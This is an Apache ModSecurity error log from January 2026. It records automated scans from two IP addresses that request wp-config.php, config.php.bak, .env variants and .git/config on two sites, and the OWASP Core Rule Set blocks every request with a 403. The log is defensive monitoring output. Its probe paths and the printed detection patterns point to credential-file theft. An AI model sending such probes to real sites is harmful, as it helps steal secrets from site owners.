[Tue Jan 13 06:19:22.639165 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWXV2kJqSCffH1oPeplGLwAAAAc"]
[Tue Jan 13 06:19:22.639342 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWXV2kJqSCffH1oPeplGLwAAAAc"]
[Tue Jan 13 06:19:22.639512 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWXV2kJqSCffH1oPeplGLwAAAAc"]
[Tue Jan 13 06:19:22.662594 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWXV2kJqSCffH1oPeplGMAAAAAc"]
[Tue Jan 13 06:19:22.662715 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWXV2kJqSCffH1oPeplGMAAAAAc"]
[Tue Jan 13 06:19:22.662869 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWXV2kJqSCffH1oPeplGMAAAAAc"]
[Tue Jan 13 06:19:22.663029 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWXV2kJqSCffH1oPeplGMAAAAAc"]
[Tue Jan 13 06:19:22.764067 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aWXV2kJqSCffH1oPeplGMgAAAAc"]
[Tue Jan 13 06:19:22.764396 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aWXV2kJqSCffH1oPeplGMgAAAAc"]
[Tue Jan 13 06:19:22.764586 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aWXV2kJqSCffH1oPeplGMgAAAAc"]
[Tue Jan 13 18:25:07.881152 2026] [:error] [pid 1377545] [client 141.98.11.171:22546] [client 141.98.11.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWZ_8wXoeqd5SCLJGqoOsAAAAAQ"]
[Tue Jan 13 18:25:07.881405 2026] [:error] [pid 1377545] [client 141.98.11.171:22546] [client 141.98.11.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWZ_8wXoeqd5SCLJGqoOsAAAAAQ"]
[Tue Jan 13 18:25:07.881561 2026] [:error] [pid 1377545] [client 141.98.11.171:22546] [client 141.98.11.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWZ_8wXoeqd5SCLJGqoOsAAAAAQ"]
[Tue Jan 13 18:25:07.921026 2026] [:error] [pid 1377545] [client 141.98.11.171:22546] [client 141.98.11.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWZ_8wXoeqd5SCLJGqoOsQAAAAQ"]
[Tue Jan 13 18:25:07.921205 2026] [:error] [pid 1377545] [client 141.98.11.171:22546] [client 141.98.11.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWZ_8wXoeqd5SCLJGqoOsQAAAAQ"]
[Tue Jan 13 18:25:07.921348 2026] [:error] [pid 1377545] [client 141.98.11.171:22546] [client 141.98.11.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWZ_8wXoeqd5SCLJGqoOsQAAAAQ"]
[Wed Jan 14 05:24:26.246382 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWcaevL7maAL7YwXfyRFzgAAAAY"]
[Wed Jan 14 05:24:26.246624 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWcaevL7maAL7YwXfyRFzgAAAAY"]
[Wed Jan 14 05:24:26.246791 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWcaevL7maAL7YwXfyRFzgAAAAY"]
[Wed Jan 14 05:24:26.267938 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWcaevL7maAL7YwXfyRFzwAAAAY"]
[Wed Jan 14 05:24:26.268142 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWcaevL7maAL7YwXfyRFzwAAAAY"]
[Wed Jan 14 05:24:26.268284 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWcaevL7maAL7YwXfyRFzwAAAAY"]
[Wed Jan 14 05:24:26.289283 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWcaevL7maAL7YwXfyRF0AAAAAY"]
[Wed Jan 14 05:24:26.289398 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWcaevL7maAL7YwXfyRF0AAAAAY"]
[Wed Jan 14 05:24:26.289587 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWcaevL7maAL7YwXfyRF0AAAAAY"]
[Wed Jan 14 05:24:26.289723 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWcaevL7maAL7YwXfyRF0AAAAAY"]
[Wed Jan 14 05:24:26.310847 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWcaevL7maAL7YwXfyRF0QAAAAY"]
[Wed Jan 14 05:24:26.311031 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWcaevL7maAL7YwXfyRF0QAAAAY"]
[Wed Jan 14 05:24:26.311175 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWcaevL7maAL7YwXfyRF0QAAAAY"]
[Wed Jan 14 05:24:26.332176 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWcaevL7maAL7YwXfyRF0gAAAAY"]
[Wed Jan 14 05:24:26.332353 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWcaevL7maAL7YwXfyRF0gAAAAY"]
[Wed Jan 14 05:24:26.332484 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWcaevL7maAL7YwXfyRF0gAAAAY"]
[Wed Jan 14 05:24:26.353577 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWcaevL7maAL7YwXfyRF0wAAAAY"]
[Wed Jan 14 05:24:26.353779 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWcaevL7maAL7YwXfyRF0wAAAAY"]
[Wed Jan 14 05:24:26.353928 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWcaevL7maAL7YwXfyRF0wAAAAY"]
[Wed Jan 14 05:24:26.375123 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWcaevL7maAL7YwXfyRF1AAAAAY"]
[Wed Jan 14 05:24:26.375327 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWcaevL7maAL7YwXfyRF1AAAAAY"]
[Wed Jan 14 05:24:26.375490 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWcaevL7maAL7YwXfyRF1AAAAAY"]
